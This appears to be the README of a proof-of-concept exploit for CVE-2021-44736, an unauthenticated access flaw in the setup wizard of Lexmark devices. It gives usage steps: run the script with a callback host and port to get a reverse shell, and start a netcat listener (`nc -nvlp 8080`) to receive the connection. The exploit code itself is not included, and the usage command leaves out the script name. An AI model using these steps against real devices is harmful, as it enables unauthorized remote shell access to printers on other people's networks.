# CVE-2021-44736 PoC

The initial admin account setup wizard on Lexmark devices allows unauthenticated access to the “out of service erase” feature.
Exploit based on the following research

## Usage

To run the exploit, pass two arguments:

- rhost - IP address of the interface for the reverse-shell connection
- rport - port number for the reverse-shell connection

```
python3 -r <rhost> -p <rport>
```


To receive the reverse-shell connection, start a listener on the specified host and port, for example using `netcat`:

```
nc -nvlp 8080
```